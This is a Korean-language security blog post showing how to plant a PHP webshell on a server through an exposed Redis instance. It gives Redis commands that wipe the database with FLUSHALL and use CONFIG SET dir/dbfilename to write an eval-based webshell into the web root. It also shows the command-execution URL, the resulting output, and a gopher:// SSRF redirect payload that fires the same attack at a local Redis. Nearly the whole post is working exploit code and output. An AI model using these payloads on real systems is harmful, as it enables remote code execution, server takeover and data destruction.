webshell upload

```bash
FLUSHALL
eval 'redis.call("set", "<?php eval($_GET[cmd]); ?>", "test");
 redis.call("config", "set", "dir", "/var/www/html/cache/");
 redis.call("config", "set", "dbfilename", "exploit.php");' 0
save
quit
```
```
http://192.168.13.133/cache/exploit.php?cmd=echo%20`ls%20-l`;
```
REDIS0008� redis-ver4.0.2� redis-bits�@�ctime�*��Y�used-mem�� �repl-stream-db���repl-id(b256256c124e6f5671af7f82508ead2baa3b784d�repl-offset�� aof-preamble���total 8 -rw-r--r-- 1 root root 28 Oct 5 13:34 aaa.php -rw-r--r-- 1 root root 221 Oct 5 13:25 exploit.php testatest��!����~


```bash
eval 'redis.call("set", "a", "test");' 0
$-1
get a
$4
test
```

redis.conf
```bash
# The filename where to dump the DB
dbfilename dump.rdb

# The working directory.
#
# The DB will be written inside this directory, with the filename specified
# above using the 'dbfilename' configuration directive.
#
# The Append Only File will also be created inside this directory.
#
# Note that you must specify a directory here, not a file name.
dir ./

```


SSRF 연계

Note ) redis는 http를 지원하지 않기 때문에, gopher를 사용해야 한다.
```php
<?php
  header("Location: gopher://127.0.0.1:6379/_FLUSHALL%0d%0aeval%20%27redis.call%28%22set%22%2C%20%22%3C%3Fphp%20eval%28%24_GET%5Bcmd%5D%29%3B%20%3F%3E%22%2C%20%22test%22%29%3B%20redis.call%28%22config%22%2C%20%22set%22%2C%20%22dir%22%2C%20%22/var/www/html/cache/%22%29%3B%20redis.call%28%22config%22%2C%20%22set%22%2C%20%22dbfilename%22%2C%20%22exploit.php%22%29%3B%27%200%0d%0asave%0d%0aquit%0d%0a");
?>
```


'Security > WebHacking' 카테고리의 다른 글

LFI, Local File Inclusion  (0) 2017.11.23
WebDAV / CVE-2017-7269  (0) 2017.11.15
redis를 통해 webshell upload  (0) 2017.10.05
XXE, XML eXternal Entity  (2) 2017.09.21
Unsafe redirect  (1) 2017.09.21
SSRF  (1) 2017.09.19